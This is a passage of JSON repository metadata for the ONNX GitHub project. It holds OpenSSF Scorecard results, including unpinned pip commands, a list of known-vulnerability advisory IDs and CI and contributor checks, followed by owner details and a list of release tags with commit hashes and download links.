hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281322869,"owners_count":26481547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18: